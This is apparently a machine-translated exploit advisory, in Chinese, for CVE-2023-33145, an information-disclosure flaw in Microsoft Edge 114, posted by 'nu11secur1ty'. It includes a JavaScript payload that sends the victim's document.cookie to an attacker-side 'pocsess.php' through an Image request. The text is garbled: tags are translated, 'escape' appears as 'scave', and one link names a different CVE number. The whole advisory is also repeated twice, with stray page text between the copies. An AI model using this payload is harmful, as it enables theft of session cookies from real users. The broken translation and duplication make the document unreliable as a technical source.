## title:microsoft Edge 114.0.1823.67(64位) - 信息披露
##作者: nu11secur1ty
## date: 07.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/edge?form=ma13fjexp=e415
##参考: https://portswigger.net/web-security/information-disclosure,
## CVE-2023-33145
## Description:
如果攻击者可以披露的信息类型
成功利用此漏洞是目标内部的数据
等网站,例如ID,令牌,Nonces,Cookie,IP,用户代理和其他网站
敏感信息。
用户必须点击专门精心设计的URL
攻击者妥协。
在此示例中,攻击者使用大步威胁建模来欺骗
受害者点击他的网站并完成。
这将很难检测到。
##结论:
请小心,可疑网站或小心谁送你
打开的链接!
## staus:高脆弱性
[+] exploit:
- 利用Server:
``JS
##当受害者点击时,这是服务器的获取请求!和
足以理解这种漏洞!=)
脚本var i=new Image();
i.src='pocsess.php?cookie='+scave(document.cookie)/脚本
## Warning: pocsess.php不会出于安全原因上传!
## br nu11secur1ty
````````
##复制:
[HREF](https://github.com/NU11Secur1ty/windows11exploits/tree/main/main/2023/cve-2023-33146)
##证明和利用
[HREF](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-ges-html)
##时间花费:
01:30:00
##作者: nu11secur1ty
## date: 07.06.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/edge?form=ma13fjexp=e415
##参考: https://portswigger.net/web-security/information-disclosure,
正在加载...
www.softwaresecured.com
## Description:
如果攻击者可以披露的信息类型
成功利用此漏洞是目标内部的数据
等网站,例如ID,令牌,Nonces,Cookie,IP,用户代理和其他网站
敏感信息。
用户必须点击专门精心设计的URL
攻击者妥协。
在此示例中,攻击者使用大步威胁建模来欺骗
受害者点击他的网站并完成。
这将很难检测到。
##结论:
请小心,可疑网站或小心谁送你
打开的链接!
## staus:高脆弱性
[+] exploit:
- 利用Server:
``JS
##当受害者点击时,这是服务器的获取请求!和
足以理解这种漏洞!=)
脚本var i=new Image();
i.src='pocsess.php?cookie='+scave(document.cookie)/脚本
## Warning: pocsess.php不会出于安全原因上传!
## br nu11secur1ty
````````
##复制:
[HREF](https://github.com/NU11Secur1ty/windows11exploits/tree/main/main/2023/cve-2023-33146)
##证明和利用
[HREF](https://www.nu11secur1ty.com/2023/07/cve-2023-33145-microsoft-ges-html)
##时间花费:
01:30:00